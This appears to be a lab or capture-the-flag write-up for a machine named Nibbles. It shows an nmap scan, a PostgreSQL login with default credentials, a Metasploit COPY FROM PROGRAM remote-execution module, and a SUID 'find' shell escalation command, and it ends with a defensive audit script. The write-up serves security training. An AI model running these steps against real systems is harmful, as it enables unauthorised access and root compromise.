# Nibbles

## Nmap

```
sudo nmap 192.168.51.47 -p- -sS -sV

PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 3.0.3
22/tcp   open   ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open   http         Apache httpd 2.4.38 ((Debian))
139/tcp  closed netbios-ssn
445/tcp  closed microsoft-ds
5437/tcp open   postgresql   PostgreSQL DB 11.3 - 11.7
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 5437 is running PostgreSQL, version between 11.3 and 11.7. I was able to log in with the default credentials `postgres:postgres` using `psql`.

```
psql -h 192.168.51.47 -U postgres -p 5437
```

![](/files/-MUxzijPPEUZJanoxOzx)

Since the target runs a PostgreSQL version higher than 9.3, the following exploit should give command execution on the target machine.

[Exploit-DB 46813: PostgreSQL 9.3-11.7 - Remote Code Execution (Authenticated)](https://www.exploit-db.com/exploits/46813)

**Description**

*Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with `pg_execute_server_program` to pipe to and from an external program using COPY. This allows arbitrary command execution as though you have console access.*

*This module attempts to create a new table, then execute system commands in the context of copying the command output into the table.*

*This module should work on all Postgres systems running version 9.3 and above.*

*For Linux & OSX systems, target 1 is used with cmd payloads such as `cmd/unix/reverse_perl`.*

*For Windows systems, target 2 is used with PowerShell payloads such as `cmd/windows/powershell_reverse_tcp`. Alternatively, target 3 can be used to execute generic commands, such as a `web_delivery` meterpreter PowerShell payload or other customized command.*

First, confirm that the current role is a superuser in PostgreSQL:

```
SELECT current_setting('is_superuser');
```

![](/files/-MUy0LmyaYeoBrS2pAHc)

With superuser status confirmed, the following `Metasploit` module gives us a shell.

```
use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
```

![](/files/-MUy0tcjMP2sV2kcz3bF)

Execution:

![](/files/-MUy19SyCwuT7aPONqQ-)

Checking SUID binaries and the PATH shows a `.` entry at the end of PATH and the SUID bit set on the `find` binary.

![](/files/-MUy23kgyWT-3jYa7heH)

Knowing this, we can attempt to gain privileges through the SUID `find` binary. The [GTFOBins](https://gtfobins.github.io/gtfobins/find/#suid) entry for `find` shows how to escalate privileges:

![https://gtfobins.github.io/gtfobins/find/](/files/-MUy2Hd35ZHoWqU8TIJ9)

Running the following escalates privileges:

```
find . -exec /bin/sh -p \; -quit
```

![](/files/-MUy2kogrjtptRX5OHM7)
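As an added defender-side check (not part of the original writeup), the POSIX sh audit below flags the two local preconditions this box relied on: a relative or empty entry in PATH and the setuid bit on a shell-spawning binary such as `find`. The function names and report format are my own.

```shell
#!/bin/sh
# Added audit helper, not part of the original writeup. Flags the two local
# weaknesses found on Nibbles: a '.' or empty entry in PATH, and a setuid bit
# on a binary that GTFOBins lists as able to spawn a shell (e.g. find).

# Return 0 when the PATH string in $1 contains an entry that does not start
# with '/': a literal '.', an empty entry (leading, trailing or doubled ':')
# or any other relative directory. Wrapping in ':' makes every entry start
# with ':' so a single case pattern covers all positions.
path_has_relative_entry() {
    case ":$1:" in
        *:[!/]*) return 0 ;;
    esac
    return 1
}

# Return 0 when the file in $1 exists, is executable and has the setuid bit.
is_setuid_binary() {
    [ -f "$1" ] && [ -x "$1" ] && [ -u "$1" ]
}

# Audit one configuration: $1 is a PATH value, remaining args are binaries to
# examine. Prints one finding per line and returns the number of findings
# (so 0 means clean), which keeps the result usable from a test or cron job.
audit_privesc_preconditions() {
    _path="$1"; shift
    _n=0
    if path_has_relative_entry "$_path"; then
        echo "FINDING: PATH contains a relative or empty entry: $_path"
        _n=$((_n + 1))
    fi
    for _bin in "$@"; do
        if is_setuid_binary "$_bin"; then
            echo "FINDING: setuid bit set on $_bin (see GTFOBins for shell-spawning options)"
            _n=$((_n + 1))
        fi
    done
    return $_n
}

# Stand-alone usage: audit this host's own PATH and the find binary.
# A non-zero return only means findings were reported, not an error.
audit_privesc_preconditions "$PATH" /usr/bin/find || true
```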
